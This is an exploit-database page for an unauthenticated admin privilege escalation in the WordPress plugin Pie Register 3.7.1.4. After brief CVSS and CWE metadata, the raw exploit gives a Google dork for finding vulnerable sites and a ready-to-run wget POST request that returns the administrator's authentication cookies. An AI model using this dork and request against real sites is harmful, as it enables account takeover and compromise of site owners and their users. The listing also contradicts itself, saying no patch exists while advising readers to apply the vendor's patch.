header-logo
Suggest Exploit
vendor:
Pie Register
by:
Lotfi13-DZ
7.5
CVSS
HIGH
Admin Privilege Escalation
284
CWE
Product Name: Pie Register
Affected Version From: <= 3.7.1.4
Affected Version To: 3.7.1.4
Patch Exists: NO
Related CWE:
CPE: a:wordpress:pie_register:3.7.1.4
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
2021

WordPress Plugin Pie Register 3.7.1.4 – Admin Privilege Escalation (Unauthenticated)

The vulnerability allows an unauthenticated attacker to escalate their privileges and gain administrative access. By sending a specially crafted request, the attacker can retrieve the authentication cookies for the admin user.

Mitigation:

Update to the latest version of the plugin or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu

Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin).

Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null